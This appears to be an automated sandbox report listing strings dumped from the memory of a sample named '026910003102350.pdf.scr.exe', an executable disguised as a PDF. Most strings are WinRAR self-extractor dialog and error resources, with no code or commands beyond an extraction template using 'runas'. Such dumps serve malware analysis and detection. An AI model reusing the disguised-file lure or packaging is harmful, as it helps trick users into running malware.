Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmp	Binary or memory string: h:mm:ss tt
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmp	Binary or memory string: h:mm tt
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmp	Binary or memory string: m/d/yyyymmmm yyyy
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmp	Binary or memory string: dddd, mmmm d, yyyy
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmp	Binary or memory string: @nvny
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: @mhv0lhv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: mv bhv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: mv`phv0
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: phv thv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: mhvnhv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ghvpihv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: qhv`ahv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: mv@alv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: mv@jhv vhvpyhv@hhv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: hv0xhvpdhv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: yhv fhv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: bhvpghv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: @hvpmhvpthvpthv`khv0
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: wpchv ohvpihv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: nhvp[hv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: rhv`ghv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: nhvp[hvrhv`ghv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: vhv`vhv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: fhvpdhvpphv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: vhv`vhvfhvpdhvpphv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: hv`rhv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ehvpxhv0yhv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: mvpehv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ehv`ehv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: zhv@nhv
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ihv uhv f
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: maximum allowed array size (%u) is exceededcmtrrh%uhc%ux%uxc%u;%u
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: .\sesecurityprivilegeserestoreprivilegesecreatesymboliclinkprivilege\??\unc\aclstmrtmp%d
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: select * from win32_operatingsystem
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: messages**
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ...root\cimv2select * from win32_operatingsystemwqlnamewindows 10?.rar.exe.sfx00?<>\|"?%c:\\\?\uncconprnauxnulcom#lpt#messages**messages*r!
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: cryptprotectmemory
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: cryptunprotectmemory
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:stringsdialogmenudirectionrtl$%s:@%s: ,s$%s@%s$%s:%s$%s:captionsizecrypt32.dllcryptprotectmemorycryptunprotectmemorycryptprotectmemory failedcryptunprotectmemory failed
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: xlistpos
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: setdlldirectoryw
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: setdefaultdlldirectories
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: unknown exception
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: bad allocation
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: xlistposkernel32setdlldirectorywsetdefaultdlldirectoriesversion.dlldxgidebug.dllsfc_os.dllsspicli.dllrsaenh.dlluxtheme.dlldwmapi.dllcryptbase.dlllpk.dllusp10.dllclbcatq.dllcomres.dllws2_32.dllws2help.dllpsapi.dllieframe.dllntshrui.dllatl.dllsetupapi.dllapphelp.dlluserenv.dllnetapi32.dllshdocvw.dllcrypt32.dllmsasn1.dllcryptui.dllwintrust.dllshell32.dllsecur32.dllcabinet.dlloleaccrc.dllntmarta.dllprofapi.dllwindowscodecs.dllsrvcli.dllcscapi.dllslc.dllimageres.dlldnsapi.dlliphlpapi.dllwinnsi.dllnetutils.dllmpr.dlldevrtl.dllpropsys.dllmlang.dllsamcli.dllsamlib.dllwkscli.dlldfscli.dllbrowcli.dllrasadhlp.dlldhcpcsvc6.dlldhcpcsvc.dllxmllite.dlllinkinfo.dllcryptsp.dllrpcrtremote.dllaclui.dlldsrole.dllpeerdist.dlluxtheme.dllplease remove %s from %s folder. it is unsecure to run %s until it is done.createthread failed
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: waitformultipleobjects error %d, getlasterror %d
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: thread pool initialization failed.%ls>%s: %s
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: unknown exceptionbad allocation
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: z2fq`
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: rarhtmlclassnameshell.explorerabout:blank<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head></html></p><br><style></style><style>body{font-family:"arial";font-size:12;}</style>
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_browsetitle
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_cmdextracting
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_skipping
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_unexpeof
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_fileheaderbroken
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_headerbroken
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_mainheaderbroken
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_cmtheaderbroken
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_cmtbroken
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_outofmemoryerror
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_unknownmethod
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_cannotopen
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_cannotcreate
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_cannotmkdir
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_encrcrcfailed
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_extrcrcfailed
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_packeddatacrcfailed
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_writeerror
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_readerror
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_closeerror
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_cannotfindvol
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_badarchive
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_extracting
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_asknextvoltitle
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_archeaderbroken
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_done
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_error
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_errors
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_bytes
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_modifiedon
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_badfolder
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_createerrors
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_restarthint
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_crcerrors
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_allfiles
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_title1
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_title1a
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_title2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_title3
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_title4
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_title5
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_title6
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_arcbroken
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_extrfilesto
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_extrfilestotemp
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_extractbutton
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_extractprogress
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_maxpathlimit
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_unkencmethod
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_wrongpassword
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_wrongfilepassword
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_copyerror
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_cannotcreatelnks
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_cannotcreatelnkh
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_errlnktarget
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_needadmin
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_pause
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_continue
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_secwarning
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: s:ids_secdeldll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $startdlg:size
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $startdlg:caption
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $startdlg:idc_destedittitle
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $startdlg:idc_changedir
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $startdlg:idc_progressbartitle
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $startdlg:idok
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $startdlg:idcancel
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $replacefiledlg:size
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $replacefiledlg:caption
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $replacefiledlg:idc_owrfileexists
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $replacefiledlg:idc_owraskreplace
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $replacefiledlg:idc_owrquestion
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $replacefiledlg:idc_owryes
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $replacefiledlg:idc_owrall
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $replacefiledlg:idc_owrrename
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $replacefiledlg:idc_owrno
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $replacefiledlg:idc_owrnoall
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $replacefiledlg:idc_owrcancel
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $renamedlg:size
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $renamedlg:caption
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $renamedlg:idok
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $renamedlg:idcancel
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $renamedlg:idc_renamefrom
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $renamedlg:idc_renameto
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $getpassword1:size
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $getpassword1:caption
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $getpassword1:idc_passwordenter
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $getpassword1:idok
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $getpassword1:idcancel
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $licensedlg:size
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $licensedlg:caption
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $licensedlg:idok
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $licensedlg:idcancel
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $asknextvol:size
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $asknextvol:caption
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $asknextvol:idc_nextvolinfo1
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $asknextvol:idc_nextvolfind
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $asknextvol:idc_nextvolinfo2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $asknextvol:idok
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: $asknextvol:idcancel
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: user32.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: gdi32.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: comdlg32.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: advapi32.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: shell32.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ppngriched20.dlls:ids_browsetitles:ids_cmdextractings:ids_skippings:ids_unexpeofs:ids_fileheaderbrokens:ids_headerbrokens:ids_mainheaderbrokens:ids_cmtheaderbrokens:ids_cmtbrokens:ids_outofmemoryerrors:ids_unknownmethods:ids_cannotopens:ids_cannotcreates:ids_cannotmkdirs:ids_encrcrcfaileds:ids_extrcrcfaileds:ids_packeddatacrcfaileds:ids_writeerrors:ids_readerrors:ids_closeerrors:ids_cannotfindvols:ids_badarchives:ids_extractings:ids_asknextvoltitles:ids_archeaderbrokens:ids_dones:ids_errors:ids_errorss:ids_bytess:ids_modifiedons:ids_badfolders:ids_createerrorss:ids_restarthints:ids_crcerrorss:ids_allfiless:ids_title1s:ids_title1as:ids_title2s:ids_title3s:ids_title4s:ids_title5s:ids_title6s:ids_arcbrokens:ids_extrfilestos:ids_extrfilestotemps:ids_extractbuttons:ids_extractprogresss:ids_maxpathlimits:ids_unkencmethods:ids_wrongpasswords:ids_wrongfilepasswords:ids_copyerrors:ids_cannotcreatelnkss:ids_cannotcreatelnkhs:ids_errlnktargets:ids_needadmins:ids_pauses:ids_continues:ids_secwarnings:ids_secdeldll$startdlg:size$startdlg:caption$startdlg:idc_destedittitle$startdlg:idc_changedir$startdlg:idc_progressbartitle$startdlg:idok$startdlg:idcancel$replacefiledlg:size$replacefiledlg:caption$replacefiledlg:idc_owrfileexists$replacefiledlg:idc_owraskreplace$replacefiledlg:idc_owrquestion$replacefiledlg:idc_owryes$replacefiledlg:idc_owrall$replacefiledlg:idc_owrrename$replacefiledlg:idc_owrno$replacefiledlg:idc_owrnoall$replacefiledlg:idc_owrcancel$renamedlg:size$renamedlg:caption$renamedlg:idok$renamedlg:idcancel$renamedlg:idc_renamefrom$renamedlg:idc_renameto$getpassword1:size$getpassword1:caption$getpassword1:idc_passwordenter$getpassword1:idok$getpassword1:idcancel$licensedlg:size$licensedlg:caption$licensedlg:idok$licensedlg:idcancel$asknextvol:size$asknextvol:caption$asknextvol:idc_nextvolinfo1$asknextvol:idc_nextvolfind$asknextvol:idc_nextvolinfo2$asknextvol:idok$asknextvol:idcancelrarsfxstaticreplacefiledlgrenamedlg%s %s %s%s %sgetpassword1%sxasknextvolwinrarsfxmappingfile.tmpsfxname%4d-%02d-%02d-%02d-%02d-%02d-%03dsfxstimestartdlgsfxcmdsfxparlicensedlg __tmp_rar_sfx_access_check_%u-el -s2 "-d%s" "-sp%s"runas"%s"
